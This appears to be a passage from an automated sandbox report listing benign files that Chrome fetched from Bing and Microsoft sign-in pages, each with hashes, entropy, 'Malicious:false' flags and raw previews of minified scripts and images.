                                                                                                    SSDEEP:48:1cLdSF8cWOr7dDv8NQtaPVcbnAhaNaswAUbDdDLpmhMi7WViUCS7SDDRb:1cZSDBdDv8saMPgHfLEM8Xb3Rb
                                                                                                    MD5:61533293909D97252C70E82BD574BA68
                                                                                                    SHA1:7408DD25C19AE7BAF954074576A2F73FBB174310
                                                                                                    SHA-256:99EC639C3DDC51E7882FAB9C08EC5A905B49F4B04D1C47B6DF40F3924E81CD8E
                                                                                                    SHA-512:BF8F8879D1CABD6B8B9C6CAF9FC0A6F68362FC62328112636D78A15A4C08B35EA52E1DD8048715F2BD0E945BB0D2D8D7655E68A065942E89316E303BB536BB41
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:"https://r.bing.com/rs/6r/kQ/jnc,nj/P2A3uGO2O64dixlm8-ndJ5_iyo4.js?or=w"
                                                                                                    Preview:(function(){function l(n){return parseFloat((_w.getComputedStyle?_w.getComputedStyle(n):n.currentStyle).width)}var a="results_container",t="sb_shr sw_conv",v="sb_shr sw_conva",y={"ans2 ans_n2 ans_msnO":1},i={"sb_h3 cttl":1},r="sb_ltw",p="sb_ans",n=[],u=!!_G.SPSA,f=u?{ansC:1,results:1,sa_bop:1}:{results:1},e=!1,o=20,w=-28,b=function(){if(typeof _d.querySelector!="undefined"){var n=".sb_shr{left:"+w+o+"px;width:0;float:right;margin-left:5px}.sb_ltw{margin:0 0 0 -55px;clear:both;float:left;display:block;width:50px}.pi_tc{float:right;}";sj_ic(n);sj_evt.bind("sp.enter_conv",g,1);sj_evt.bind("sp.leave_conv",h,1);sj_evt.bind("sp.submit_conv",h)}},k=function(){var u,o,i,n,s,r,t,h;if(!e){for(u=_ge(a),o=u?u.childNodes:[],i=0;i<o.length;i++)if(n=o[i],n.id&&f[n.id]||n.className&&f[n.className])for(s=n?n.childNodes:[],r=0;r<s.length;r++)for(t=s[r].firstChild;t;)h=t.nodeType,h!==3&&h!==8&&d(t),t=t.nextSibling;e=!0}},d=function(n){var i=n.className,t;if(i&&i.indexOf(p)>-1){if(u)for(t=n.firstChild.fir
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1725), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1725
                                                                                                    Entropy (8bit):5.274895734185393
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:y2x50QNQE0YpOP8A47n0dvZ1fj5O7Rv75gZcODcv/Kum65X9gFiO5yV94GVvwCQO:7Lps4YJOVuK2KG65tggZV5
                                                                                                    MD5:2EF3074238B080B648E9A10429D67405
                                                                                                    SHA1:15D57873FF98195C57E34FC778ACCC41C21172E7
                                                                                                    SHA-256:E90558EB19208AD73F0DE1CD9839D0317594BF23DA0514F51272BF27183F01DA
                                                                                                    SHA-512:C1D7074A0EBF5968B468F98FC4C0C7829999E402DD91C617E679EEB46C873DC04096CBF9277E115FC42C97516A6C11A9F16AFA571E00F0D826BEB463E2D1F7B0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var RewardsCreditRefresh;(function(n){function r(t,i,r,u,f,e,o,s,h,c,l,a,v,y){sj_cook.set(t,i,r.toString(),!1,"/");sj_cook.set(t,u,f.toString(),!1,"/");sj_cook.set(t,e,o.toString(),!1,"/");sj_cook.set(t,s,h.toString(),!1,"/");sj_cook.set(t,c,l.toString(),!1,"/");sj_cook.set(t,a,v.toString(),!1,"/");sj_evt.fire("RewardsCookieUpdated");sj_evt.bind("identityHeaderShown",function(){return n.RewardsHeaderAnim(o,r,f,y)},1)}function u(n,r,u,f){var c;u=u||r;var o=_ge("id_rh"),e=_ge("rh_animcrcl"),l=_ge("id_rc");if(o&&l&&(e||_ge("givemuid_heart"))&&!(r<0)&&!(r<n)&&!(u<=0)){var a=800,v=r-n,s=Math.min(100,100*(r/u)),h=e&&s>=100&&n<u,y=v>0,p=Date.now();s>=100&&Lib.CssClass.add(o,"rh_reedm");e&&Lib.CssClass.add(e,"anim");c=function(u){if(u){var k=Date.now(),w=k-p,b=Math.min(w/a,1),d=h?t*b:t*s/100,g=y?Math.min(Math.floor((n+b*v)/f)*f,r):r,l=_ge("rewardsAnimation");e&&e.setAttribute("stroke-dasharray",d.toString()+","+t.toString());u.innerText=g.toString();(h||y)&&(w<a?i(function(){return c(u)}):(u.i
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (888), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):888
                                                                                                    Entropy (8bit):5.1970220185324045
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2QiCUrgtI/QHnUrtrRIRJ7ea/TwH4Mnbx+yGow0N:SK44AIb/7QUH0N
                                                                                                    MD5:F1CF1909716CE3DA53172898BB780024
                                                                                                    SHA1:D8D34904E511B1C9AAE1565BA10CCD045C940333
                                                                                                    SHA-256:9ABAC0CBFA6F89106B66CD4F698EAD5CCBF615ECF8CD7E9E88567A7C33CFEC01
                                                                                                    SHA-512:8B641E93405565B4A57C051EDEFC8E02D6C929DDD4C52F9BFBD19C57896AA40426BF5ED6760DBD479719561C4F0A25BFC4102F0F49D3D308035C9CA90B1D0FCE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/2NNJBOURscmq4VZboQzNBFyUAzM.js
                                                                                                    Preview:(function(){function f(){var u=o(),i,t,f;if(u)for(i=s(u),t=0;t<i.length;t++)f=i[t].id.replace(n,""),Log&&Log.Log&&Log.Log("Info",r,f,!1,"Text",t.toString()),sj_be(i[t],"mousedown",e)}function e(t){var r=i(t.target),f;r!=null&&(f=r.id.replace(n,""),Log&&Log.Log&&Log.Log("Info",u,f))}function i(t){if(t!=null){var r=t.id;return r!=null&&r.indexOf(n)===0?t:i(t.parentElement)}return null}function o(){var n=_d.querySelectorAll(".b_scopebar > ul");return n&&n.length>0?n[0]:null}function s(i){for(var r,o,u=[],e=i.children,f=0;f<e.length;f++)r=e[f].id,r!=null&&r!==t&&r.indexOf(n)===0?u.push(e[f]):r!=null&&r===t&&(o=h(),u.push.apply(u,o));return u}function h(){var n=_d.querySelectorAll(".b_scopebar #b-scopeListItem-menu .b_sp_over_menu .b_scopebar_item");return Array.prototype.slice.call(n)}var n="b-scopeListItem-",t=n+"menu",r="DynScopeRank",u="DynScopeClick";sj_evt.bind("onP1",f)})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (37756), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):37756
                                                                                                    Entropy (8bit):5.5286674347569065
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:6jiIrpis31lUc4jzmU62pffR75Ql+HCmEOO8C0EBNrpA23/H8tQJ1CN9MQWt3/p9:6Ph31SUA15u+QvctMxbMVX5Xu
                                                                                                    MD5:423885818D67BFCF00E21BE13F6F3A71
                                                                                                    SHA1:A79144758AF1204BB161FCD79E74C1F692AFB7A5
                                                                                                    SHA-256:5BB552BEB00AF20A3A39660DECABBA8520CF53FF43594D1CD923F9217081D169
                                                                                                    SHA-512:99343F25EC96FE803D57A1787CEFF649A5350DE6E5624990214D604CDD6CB3A4C5A8C069A024712C83E70AB91424AC1AC1F7D3C7E16F9FD498342C46DED593A2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/p5FEdYrxIEuxYfzXnnTB9pKvt6U.js
                                                                                                    Preview:!function(){const noop=()=>{},optionsScript=document.querySelector("script[type=esms-options]"),esmsInitOptions=optionsScript?JSON.parse(optionsScript.innerHTML):{};Object.assign(esmsInitOptions,self.esmsInitOptions||{});let shimMode=!!esmsInitOptions.shimMode;const importHook=globalHook(shimMode&&esmsInitOptions.onimport),resolveHook=globalHook(shimMode&&esmsInitOptions.resolve);let fetchHook=esmsInitOptions.fetch?globalHook(esmsInitOptions.fetch):fetch;const metaHook=esmsInitOptions.meta?globalHook(shimModule&&esmsInitOptions.meta):noop,skip=esmsInitOptions.skip?new RegExp(esmsInitOptions.skip):null;let nonce=esmsInitOptions.nonce;const mapOverrides=esmsInitOptions.mapOverrides;if(!nonce){const nonceElement=document.querySelector("script[nonce]");nonceElement&&(nonce=nonceElement.nonce||nonceElement.getAttribute("nonce"))}const onerror=globalHook(esmsInitOptions.onerror||noop),onpolyfill=esmsInitOptions.onpolyfill?globalHook(esmsInitOptions.onpolyfill):()=>{console.log("%c^^ Module T
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):49911
                                                                                                    Entropy (8bit):7.994516776763163
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                    MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                    SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                    SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                    SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                    Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2767), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2767
                                                                                                    Entropy (8bit):5.202622372667036
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Z1qiLqvTeNvWxpFbMvAczkvZHZKc6ZDuUiXjd8Kw0D0/3xQBbmas6Wre:Z1qiLqaOxpeoZ648mDE30J
                                                                                                    MD5:904AB0DAA735504AAE493BA7168338A4
                                                                                                    SHA1:4DFDEC86B14E7F7418E3639A3E15B3023C6F6DD2
                                                                                                    SHA-256:9614EDCC490D84BFE36813C2E0707937B33D9DBC47FFA2DB58E3BECAB7F255AA
                                                                                                    SHA-512:20464BB50DC383DAB6274AE469BF3B9DADC2D8F3DB815513DF07288BF5E3430390E69621D62A4B4CC1E94E67A3167187FADB33D4CEA77436AA43A46C367A6388
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){function nt(){var r=_ge("b_results"),u;r!=null&&(u=ft(e),typeof _w!="undefined"&&u&&(sj_be(_d,e.visibilityChangedEventName,b),sj_evt.bind("ajax.unload",c)),n=r.querySelectorAll(d),rt(),sessionStorage[t]&&sessionStorage.removeItem(t),sessionStorage[i]&&sessionStorage.removeItem(i))}function tt(){var n="sschkad",t="sschvad",i;try{if(typeof Storage=="undefined"||typeof sessionStorage=="undefined"||(sessionStorage.setItem(n,t),i=sessionStorage.getItem(n),sessionStorage.removeItem(n),i!=t))return!1}catch(r){return!1}return!0}function v(n){while(n&&n.id!="b_results"){if(n.classList&&(n.classList.contains("b_algo")||n.classList.contains("sb_adTA")))return n;n=n.parentElement}return null}function s(){var e,o;if(r=y(t),u=y(i),n&&r&&u){for(f=null,e=0;e<n.length;e++)if(o=n[e],o&&r==o.getAttribute("href")&&u==e.toString()){f=v(o);break}f&&it()}}function it(){var t=document.getElementById("inline_rs"),i=_ge(l);if(!t||!i){c();h();return}n&&f&&(_w.sj_log&&sj_log("CI.RSSQB","Show","Trigger
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (838), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):838
                                                                                                    Entropy (8bit):5.10179630103155
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:01rReu5mXKBj/BsKkRW5LuRWCfRM7ssdvcR:09wwDEw56w2+s6cR
                                                                                                    MD5:8C8B189422C448709EA6BD43EE898AFB
                                                                                                    SHA1:A4D6A99231D951F37D951BD8356D9D17664BF447
                                                                                                    SHA-256:567506D6F20F55859E137FCBD98F9E1A678C0D51192FF186E16FD99D6D301CFF
                                                                                                    SHA-512:6FAA73D59082065426769A27081CBEDCD22146EF948AFDD9A86801F205B2DDDC63E03AC5D555EF0AF23EF05901EBFFE7E8AADD82260EF505CB89D99E572FDF4A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/pNapkjHZUfN9lRvYNW2dF2ZL9Ec.js
                                                                                                    Preview:var CursorProgress;(function(n){function f(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function e(n){var u,e,o,s;n.button!==0||n.ctrlKey||n.shiftKey||(u=f(sj_et(n)),u!=null)&&u.getAttribute("role")!=="button"&&(r(),e=(u.getAttribute("href")||"").trim().toLowerCase(),e!==""&&e.indexOf("javascript:")!==0&&e.indexOf("#")!==0)&&(o=u.getAttribute("target"),o===null||o.trim()==="")&&(Lib.CssClass.add(u,t),s=_ge("b_content"),s!==null&&Lib.CssClass.add(s,t),i!==null&&(sb_ct(i),i=null),i=sb_st(r,5e3))}function r(){for(var i=_d.getElementsByClassName(t),n=i.length-1;n>=0;n--)Lib.CssClass.remove(i[n],t)}function u(){var r=_ge("b_content"),n,t,i;if(r!==null&&(n=r.getElementsByTagName("A"),n))for(t=0;t<n.length;t++)(i=n[t],i)&&sj_be(i,"click",e)}var t="b_CursorProgress",i=null;n.bind=u;u()})(CursorProgress||(CursorProgress={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 80x80, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1562
                                                                                                    Entropy (8bit):7.599886494775448
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Z9CqaFBxpEzVoEYQsbkvQDBsEAvaaZWWnS7Lz36L1vtHnynuQai9FIAyduzTP:ZlqvEO1bBsEnQNOH34vtHnynuJi9Ffhb
                                                                                                    MD5:D5A08251482AD1EDF7EBA5A8E55B1C2F
                                                                                                    SHA1:C9B9B92ACA81A644465EEA2DA65C5B965B7FC5F3
                                                                                                    SHA-256:D87DA36806D010E784E81D1C4C64AC2D82549455EF581144117D3C02C7FF6870
                                                                                                    SHA-512:64869236ED65CC035409BD69E7F1B9EDDD1AB24BDDD75E9CE41AA017C9AB315F6B8E44392E3D46AD9A7783F1EAD50DE6E94305501DAB73C8FD3AFB9BE1152280
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=OIP.O6s9oZE3a3EvKT-n2dcvegAAAA&w=80&h=80&c=1&vt=10&bgcl=a63756&r=0&o=6&pid=5.1
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............P.P..".................................................K........mf..p-.Y.E..^w...do.7.....M.f.[^{>...b...?.-^...=..5a..Q.. ...5.. gY^..........................................wiF..4*s..1$..Bl.*.&..IL...."7.......;..........................!1Aq"Q....#2ab. 45Br..CDRSs............?..._Z.D.\...3.T.aq+.io.'# ..k.7!.....j.....\.....z...$j^GTA..._m....fy...+...i .H...c.9n.o...H]d...pe9........b....IP::.....YR...C.".n....../!...'%.k......RR.U.+.....}....&.$Oe..X....>...j...F).om .'.V..D...?c..a..R"G...GSR...p\.>..M.$..H..q.R...#.1..........Q..5....`.l..:.>ye..Y.........MX..............n.O....k..G.U..R..{.V .@t...<.mt.5....<.nQM.5a..a..{|.Q...k..%........[F3.n..?.j..*.......U..+..h.x.."C.f.f..Z.v.b........T...;.Y..h....y........xc..X$...U........S..O...'...<...'p`......j....2.;Dos..SR.u..l..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:40:12], progressive, precision 8, 160x160, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6817
                                                                                                    Entropy (8bit):7.859219052464007
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:sO4w46jQPjxS2VUxVMkjqHqHfGaOUE37ri:sO346jojxR0WKHfoe
                                                                                                    MD5:0C41EE31B04E978B4882D17690F03A3A
                                                                                                    SHA1:1890E62ABDFF4D2DD0A66E8A10BF5429440A50EE
                                                                                                    SHA-256:97785743A5FFC303FF8B7B465CD12AF8403F7EED2B2D19687E118E2621059741
                                                                                                    SHA-512:88555E4C500A6B416E8A8E783497B1F6925EEAF708991080E3776757102D9D522CA4830CE924ACA23EC55C579AAC5CFCA7116343236FE8BF8A13FB2DFBD104AD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:40:12....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................!e."E.T....!......S-C`!..bB.e.J2.z..:<....9.=.[....... .l..Rwy...X..s..u....!.a gNe..+......r...!..-8ZX%..!.e..e../.]..e.vk.R0._;.|..<hE...l..i..,.s.Ec.e.G..T....|.s..K..............+.|.q.=..1*r..$vSb..^q.(hk/..w8...;.v..p:.....C.k.....q.(.M..M.....}q.r+...N.....#.xK.O.....Ci.S=s...}ea[..>MC4.zN;w.Z.%...g.....jo:.g..L.7.......K3...oa.}.=3.<No.|*l..q...#Iszt.z..g..%...z..m.....q....t.L%.\Xc..r:.a...........*s{.A..=.z%.W....y}}..W..2......*^..s..^...R.$..K..E'M........c.[..Buhvu....H...7N.=...o|...Z[\.:.=..3.......jP...k....p.....r. ...!R.z2....*`T.......H.*k,..`.@..$P@G...(....
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (576), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):576
                                                                                                    Entropy (8bit):5.192163014367754
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:9mPi891gAseP24yXNbdPd1dPkelrR5MdKIKG/OgrfYc3tOfIvHbt:9mPlP5smDy1dV1dHrLMdKIKG/OgLYgtV
                                                                                                    MD5:F5712E664873FDE8EE9044F693CD2DB7
                                                                                                    SHA1:2A30817F3B99E3BE735F4F85BB66DD5EDF6A89F4
                                                                                                    SHA-256:1562669AD323019CDA49A6CF3BDDECE1672282E7275F9D963031B30EA845FFB2
                                                                                                    SHA-512:CA0EB961E52D37CAA75F0F22012C045876A8B1A69DB583FE3232EA6A7787A85BEABC282F104C9FD236DA9A500BA15FDF7BD83C1639BFD73EF8EB6A910B75290D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/KjCBfzuZ475zX0-Fu2bdXt9qifQ.js
                                                                                                    Preview:var SsoFrame;(function(n){function t(n){if(n&&n.url&&n.sandbox){var t=sj_ce("iframe"),i=t.style;i.visibility="hidden";i.position="absolute";i.height="0";i.width="0";i.border="none";t.src=decodeURIComponent(n.url);t.id="aadssofr";t.setAttribute("sandbox",n.sandbox);_d.body.appendChild(t);n.currentEpoch&&sj_cook.set("SRCHUSR","T",n.currentEpoch,!0,"/");Log&&Log.Log&&Log.Log("ClientInst","NoSignInAttempt","OrgId",!1)}}function i(n){try{n&&n.length===2&&t(n[1])}catch(i){}}n.createFrame=t;n.ssoFrameEntry=i;sj_evt.bind("ssoFrameExists",i,!0,null,!1)})(SsoFrame||(SsoFrame={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):256
                                                                                                    Entropy (8bit):5.688396110170015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPKLMR/C+wACgQNyld+/ou6Hp0NsT:6v/7iQ/WXuJ0
                                                                                                    MD5:59C20BA187FD2EF84124F13177CD0F2B
                                                                                                    SHA1:0C1655BFD5B1A1234662288B8A5AF1A29E3EB05A
                                                                                                    SHA-256:DB1E4BD6D917C0D899EA00B28549F5A1DC963E0A1ECAB968D0633068153937A8
                                                                                                    SHA-512:A3791F3AC0D8F67FF09E64A8A11D773776A1B2B13B453E874EE2889290E0167D9667659089013F0EEFAA25A59858E974FDBA3A9EA26A04E4B02BB7777212A21D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://services.bingapis.com/favicon/?url=products.office.com
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATXG....0...7...#.}$.....N..bu...,.....>>.mm....8....K....@....NW..n......cL..7....0....\...v.k.. ......`x....GT..{....IEND.B`...................................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1060), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1060
                                                                                                    Entropy (8bit):5.351152776949957
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2QmZ6qv3dhazSaxa7onMZN1GqPTz0KmNn4zVAoL3tMTCDU1nAA9zR9uHemdXp:2Om74MZN1tPv0KmNjAtMGD0zRPo
                                                                                                    MD5:F4DA106E481B3E221792289864C2D02A
                                                                                                    SHA1:D8BA5C1615A4A8ED8EE93C5C8E2EA0FB490A0994
                                                                                                    SHA-256:47CB84D180C1D6BA7578C379BDC396102043B31233544E25A5A6F738BB425AC9
                                                                                                    SHA-512:66518EE1B6C0DF613074E500A393E973844529CA81437C4BAFE6BF111CBA4D697AF4FE36B8D1B2AA9B25F3EB93CD76DF63ABFC3269AC7E9F87C5F28A3764008E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){function t(t){typeof Log!==n&&typeof Log.Log!==n&&Log.Log("NcHeader","Rewards",t,!0)}function i(){var u,e,r,a,o,v,y,s,i,h;if(typeof bepcfg===n)t("bepcfg Undefined");else if(u=_ge("nc_iid"),u){var c=typeof bepcfg.wb!==n,l=typeof bepcfg.v!==n,f=u.getAttribute("_IG");if(f&&f.length||(f=_G.IG),e="&IID="+u.getAttribute("_iid")+"&IG="+f,l)try{sj_cook.get("")}catch(p){e+="&CID="+u.getAttribute("_cid")}r="/rewardsapp/ncheader?ver="+_G.AppVer+e;a=r;try{o=undefined;v=/(^|&)uncrunched=1(&|$)/i;o=v.exec(_w.location.search.substr(1));r=r+(o?"&uncrunched=1":"")}catch(w){r=a}y=_ge("rewardsEntryPoint");y&&(r="".concat(r,"&loadEntryPointsScript=1"));s=[_w.top,_w];i=sj_gx();i.open("POST",r,!0);i.setRequestHeader("Content-type","application/x-www-form-urlencoded");c&&(i.onreadystatechange=function(){i&&i.readyState==4&&i.status==200&&sj_appHTML(document.body,i.responseText)});h="wb="+(c?bepcfg.wb:"0");l&&(h+=";i="+(s[0]!==s[1].self?0:1)+";v="+bepcfg.v);i.send(h)}else t("nc_iid NotFound")}var
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:38:22], progressive, precision 8, 160x160, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):5387
                                                                                                    Entropy (8bit):7.799957991588148
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sQ+bfdSpU7SG7bVFwZ1w2f7yXMAZpqdiCRf6LtoIJ7g0WRiKQS+FhIeEIboU3cq:sRdSpU7vbVFwZ11jIIO6M7JqoIZuz3cq
                                                                                                    MD5:69D162774F894FF8B920330E376B7A62
                                                                                                    SHA1:F79CF9C0CCB851C7DB4924A54B0EFCD2F4398CA0
                                                                                                    SHA-256:C9FAA34663FE19EB4D8C007BF00AD7C4BC993F70C9FC42A04801ECCDD59008F7
                                                                                                    SHA-512:9D0E7FA4AC408D9D7D86186E05258BDB615B04AE8EC0DF813C3307A646EC4F87AABA1FCD77914AEA1FFE3607B87BBCA2DCC5D18C076D8AECDEA1496910AEC87D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/95z5wMy4UcfbSSSlSw780vQ5jKA.jpg
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:38:22....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.......................................................................................S&....1...\.g).l.....^S......^,I..c.7,..YX(."..>wiT.y.:^8........R*.-)s..>.+@..c..V.[Af...T.........3........B.|.~...A..|..r.......(qC..m~..nb...r.LIU.i3.K..........y.]5..\W;b.:/F...v.OW.R^...y^}4._...I4.t....l......,.$.C.....6..IS..E...../..J...5...%....Z.eK.u....j.........*x.{..t.!....@,...}..W...X8.S.........X.Z...-.w..(.8...z..EC..\....8.m5...z....Y.!\...!@.<:b].-.i}.....?..%...=gE.VM..\.2CJ..kK.d...o.!..v...M.e..4,...l...Y0...V.[.g..r.....h.....[-..-.....J....9kA..L...#.!"."kO.;...R.2...)Mr...X8....G.;A..".!az..Ud.Ie......+..........................!34 "12..$0ABCD........
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1345), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1345
                                                                                                    Entropy (8bit):5.057450072266418
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:RcedenXv30NJFhjwmiNaxjfvjDminlYXrH5uR914H9HzrhLVD/WhMPcejOVYa:2edenfOJTiuDvmiEZuR92d3/TPlE
                                                                                                    MD5:1174545448FDCEEAC97791FB61E77D7E
                                                                                                    SHA1:1B849906F6A50216F85B902C562BA15358A2FE92
                                                                                                    SHA-256:43490C2CB9A634745C90E0CADAC31A900202732D8446A0C861E789CB191C9FD6
                                                                                                    SHA-512:32C6AA89EE6609718A7462CC55B1E7818403F1E79D73835C6B5A64DA9340036A23F7918CD095D51F6D4D86BA22D2A790CD84F562FCA61E0D059173FC9BE3C5B5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var NewsAnswerHoverEffect;(function(){"use strict";function e(){n&&(t(n,"mouseenter",".na_ti",f,!0),t(n,"mouseleave",".na_ti",i,!0),t(n,"mouseenter",".na_citem",f,!0),t(n,"mouseleave",".na_citem",i,!0),n.addEventListener("click",function(n){for(var u=n||window.event,t=u.target;t&&t.hasOwnProperty("parentNode")&&this!==t&&!(r(t,".na_citem")||r(t,".na_ti"));)t=t.parentNode;i.call(t,u)}))}function f(){var n=o();this.setAttribute("mouseEventId",n);Log.Log(u,"News.Answer.Card.MouseEnter","UserMouseEnter",!1,"MouseEventId",n)}function i(){var n=this.getAttribute("mouseEventId");n&&(this.removeAttribute("mouseEventId"),Log.Log(u,"News.Answer.Card.MouseLeave","UserMouseLeave",!1,"MouseEventId",n))}function o(){var n=function(){return Math.floor((1+Math.random())*65536).toString(16).substring(1,5)};return[n(),n(),"-",n(),"-",n(),"-",n(),"-",n(),n(),n()].join("")}function t(n,t,i,u,f){n.addEventListener(t,function(n){var t=n||window.event,f=t.target;if(r(f,i))return u.apply(f,t)},!!f)}function r
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
